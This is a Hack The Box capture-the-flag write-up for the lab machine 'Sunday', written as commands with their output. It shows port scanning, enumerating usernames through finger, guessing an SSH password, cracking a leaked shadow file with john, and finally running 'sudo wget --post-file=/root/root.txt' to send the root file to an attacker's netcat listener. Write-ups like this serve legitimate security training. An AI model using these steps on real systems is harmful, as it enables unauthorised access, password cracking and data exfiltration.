Hack The Box - Sunday (Without Metasploit)
Configuration
The operating system that I will be using to tackle this machine is a Kali Linux VM.
What I learnt from other writeups is that it was a good habit to map a domain name to the machine’s IP address so as that it will be easier to remember. This can done by appending a line to /etc/hosts
.
1
$ echo "10.10.10.76 sunday.htb" | sudo tee -a /etc/hosts
Reconnaissance
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
$ rustscan --accessible -a sunday.htb -r 1-65535 -- -sT -sV -sC -Pn
File limit higher than batch size. Can increase speed by increasing batch size '-b 1048476'.
Open 10.10.10.76:111
Open 10.10.10.76:79
Open 10.10.10.76:22022
Open 10.10.10.76:46883
Starting Script(s)
Script to be run Some("nmap -vvv -p ")
Starting Nmap 7.80 ( https://nmap.org ) at 2021-01-19 13:19 UTC
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 13:19
Completed NSE at 13:19, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 13:19
Completed NSE at 13:19, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 13:19
Completed NSE at 13:19, 0.00s elapsed
Initiating Connect Scan at 13:19
Scanning sunday.htb (10.10.10.76) [4 ports]
Discovered open port 111/tcp on 10.10.10.76
Discovered open port 22022/tcp on 10.10.10.76
Discovered open port 79/tcp on 10.10.10.76
Discovered open port 46883/tcp on 10.10.10.76
Completed Connect Scan at 13:19, 0.01s elapsed (4 total ports)
Initiating Service scan at 13:19
Scanning 4 services on sunday.htb (10.10.10.76)
Completed Service scan at 13:19, 26.05s elapsed (4 services on 1 host)
NSE: Script scanning 10.10.10.76.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 13:19
Completed NSE at 13:20, 11.08s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 13:20
Completed NSE at 13:20, 1.17s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 13:20
Completed NSE at 13:20, 0.00s elapsed
Nmap scan report for sunday.htb (10.10.10.76)
Host is up, received user-set (0.0066s latency).
Scanned at 2021-01-19 13:19:26 UTC for 38s
PORT STATE SERVICE REASON VERSION
79/tcp open finger syn-ack Sun Solaris fingerd
|_finger: No one logged on\x0D
111/tcp open rpcbind syn-ack 2-4 (RPC #100000)
22022/tcp open ssh syn-ack SunSSH 1.3 (protocol 2.0)
| ssh-hostkey:
| 1024 d2:e5:cb:bd:33:c7:01:31:0b:3c:63:d9:82:d9:f1:4e (DSA)
| ssh-dss AAAAB3NzaC1kc3MAAACBAKQhj2N5gfwsseuHbx/yCXwOkphQCTzDyXaBw5SHg/vRBW9aYPsWUUV0XGZPlVtbhxFylTZGNZTWJyndzQL3aRcQNouwVH8NnQsT63s4uLKsAP3jx4afAwB7049PvisAxtDVMbqg94vxaJkh88VY/EMpASYNrLFtr1mZngrbAzOvAAAAFQCiLK6Oh21fvEjgZ0Yl0IRtONW/wwAAAIAxz1u+bPH+VE7upID2HEvYksXOItmohsDFt0oHmGMHf9TKwZvqQLZRix0eXYu8zLnTIdg7rVYSjGyRhuWeIkl1+0aIJL4/dzB+JthInTGFIngc83MtonLP4Sj3YL20wL9etVh8/M0ZOedntWrQcUW+8cUWZRlgW8q620HZKE8VqAAAAIB0s8wn1ufviVEKXct60uz2ZoduUgg07dfPfzvhpbw232KYUJ6lchTj2p2AV8cD0fk2lok2Qc6Kn/OKSjO9C0PlvG8WWkVVvlISUY4BEhtqtL3aof7PYp5nCrLK+2v+grCLxOvyYpT1OfDMQbahOWGZ9OCwQtQXKP1wYEQMqMsSRg==
| 1024 e4:2c:80:62:cf:15:17:79:ff:72:9d:df:8b:a6:c9:ac (RSA)
|_ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAxAwq7HNZXHr7XEeYeKsbnaruPQyUK5IkSE/FxHesBaKQ37AsLjw8iacqUvcs8IuhPfiTtwuwU42zUHu1e1rmLpRlMyLQnjgJH1++fP5E0Qnxj4DrFr7aeRv1FqPkrnK/xCX46AdgUhs4+4YA04yfi8pOlaSEVucYaqWNhuqJkt8=
46883/tcp open unknown syn-ack
Service Info: OS: Solaris; CPE: cpe:/o:sun:sunos
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 13:20
Completed NSE at 13:20, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 13:20
Completed NSE at 13:20, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 13:20
Completed NSE at 13:20, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 38.70 seconds
Enumeration (1)
Port 79 Sun Solaris fingerd
The finger
service allows us to see who is currently logged on.
1
2
$ finger @sunday.htb
No one logged on
No one is logged on. However we can use this tool to help us enumerate the usernames on the machine by bruteforcing with a give list of names.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
$ perl finger-user-enum.pl -U /usr/share/seclists/Usernames/Names/names.txt -t sunday.htb -m 100
Starting finger-user-enum v1.0 ( http://pentestmonkey.net/tools/finger-user-enum )
----------------------------------------------------------
| Scan Information |
----------------------------------------------------------
Worker Processes ......... 100
Usernames file ........... /usr/share/seclists/Usernames/Names/names.txt
Target count ............. 1
Username count ........... 10177
Target TCP port .......... 79
Query timeout ............ 5 secs
Relay Server ............. Not used
######## Scan started at Tue Jan 19 09:52:40 2021 #########
access@sunday.htb: access No Access User < . . . . >..nobody4 SunOS 4.x NFS Anonym < . . . . >..
admin@sunday.htb: Login Name TTY Idle When Where..adm Admin < . . . . >..lp Line Printer Admin < . . . . >..uucp uucp Admin < . . . . >..nuucp uucp Admin < . . . . >..dladm Datalink Admin < . . . . >..listen Network Admin < . . . . >..
anne marie@sunday.htb: Login Name TTY Idle When Where..anne ???..marie ???..
bin@sunday.htb: bin ??? < . . . . >..
dee dee@sunday.htb: Login Name TTY Idle When Where..dee ???..dee ???..
jo ann@sunday.htb: Login Name TTY Idle When Where..jo ???..ann ???..
la verne@sunday.htb: Login Name TTY Idle When Where..la ???..verne ???..
line@sunday.htb: Login Name TTY Idle When Where..lp Line Printer Admin < . . . . >..
message@sunday.htb: Login Name TTY Idle When Where..smmsp SendMail Message Sub < . . . . >..
miof mela@sunday.htb: Login Name TTY Idle When Where..miof ???..mela ???..
sammy@sunday.htb: sammy console <Jul 31 17:59>..
root@sunday.htb: root Super-User pts/3 <Apr 24, 2018> sunday ..
sunny@sunday.htb: sunny pts/3 <Apr 24, 2018> 10.10.14.4 ..
zsa zsa@sunday.htb: Login Name TTY Idle When Where..zsa ???..zsa ???..
######## Scan completed at Tue Jan 19 09:54:14 2021 #########
14 results.
Usernames that do not have ???..
in their fields are legitimate usernames. Out of these, we were able to gather that admin
, bin
, line
, message
, sammy
, sunny
and root
are real usernames, but only sammy
, sunny
and root
had logons occuring on them so lets focus on them.
I would normally use hydra
to brute-force their passwords, but it was so unstable I ended up manually guessing and got the password of sunny
, which happens to be sunday
. We then use this password to ssh
into the machine.
1
2
3
4
5
6
$ ssh sunny@sunday.htb -p 22022
Password:
Last login: Tue Apr 24 10:48:11 2018 from 10.10.14.4
Sun Microsystems Inc. SunOS 5.11 snv_111b November 2008
sunny@sunday:~$ id
uid=65535(sunny) gid=1(other) groups=1(other)
Enumeration (2)
There was a folder at /backup
containing 2 files.
1
2
3
4
5
6
sunny@sunday:~$ ls -al /backup
total 5
drwxr-xr-x 2 root root 4 2018-04-15 20:44 .
drwxr-xr-x 26 root root 27 2020-07-31 17:59 ..
-r-x--x--x 1 root root 53 2018-04-24 10:35 agent22.backup
-rw-r--r-- 1 root root 319 2018-04-15 20:44 shadow.backup
We were only able to read shadow.backup
, but instead contained the password hashes of sammy
and sunny
!
1
2
3
4
sunny@sunday:~$ cat /backup/shadow.backup
...
sammy:$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:6445::::::
sunny:$5$iRMbpnBv$Zh7s6D7ColnogCdiVE5Flz9vCZOMkUFxklRhhaShxv3:17636::::::
I then went on to crack the hash of sammy
using john
.
1
2
3
4
5
6
7
$ john --wordlist=/usr/share/wordlists/rockyou.txt shadow.backup
Using default input encoding: UTF-8
Loaded 2 password hashes with 2 different salts (sha256crypt, crypt(3) $5$ [SHA256 128/128 AVX 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
cooldude! (sammy)
We can then su
to sammy
.
1
2
3
4
5
sunny@sunday:~$ su - sammy
Password:
Sun Microsystems Inc. SunOS 5.11 snv_111b November 2008
sammy@sunday:~$ id
uid=101(sammy) gid=10(staff) groups=10(staff)
user.txt
The user flag is in sammy
’s home directory.
1
2
sammy@sunday:~$ cat Desktop/user.txt
a3d9XXXXXXXXXXXXXXXXXXXXXXXXXXXX
Enumeration (3)
Checking sammy
’s sudo
rights, we see that he can run wget
as root
.
1
2
3
sammy@sunday:~$ sudo -l
User sammy may run the following commands on this host:
(root) NOPASSWD: /usr/bin/wget
This means we could use wget
to overwrite /etc/passwd
or use wget
to exfiltrate out files. This box was very unstable, so I decided to just stick with exfiltrating. (I am sorry for not following the standard of getting a shell but the instability of this machine was too much for me haha)
Exploitation / root.txt
We can start a nc
listener
1
2
3
$ sudo rlwrap nc -lvnp 80
[sudo] password for kali:
listening on [any] 80 ...
And then use wget
to send out the contents of the root flag in root
’s home directory.
1
2
3
4
5
sammy@sunday:~$ sudo wget --post-file=/root/root.txt 10.10.XX.XX
--20:51:15-- http://10.10.XX.XX/
=> `index.html'
Connecting to 10.10.XX.XX:80... connected.
HTTP request sent, awaiting response...
Then on our listener, we get the root flag!
1
2
3
4
5
6
7
8
9
10
11
12
$ sudo rlwrap nc -lvnp 80
listening on [any] 80 ...
connect to [10.10.XX.XX] from (UNKNOWN) [10.10.10.76] 46114
POST / HTTP/1.0
User-Agent: Wget/1.10.2
Accept: */*
Host: 10.10.XX.XX
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 33
fb40XXXXXXXXXXXXXXXXXXXXXXXXXXXX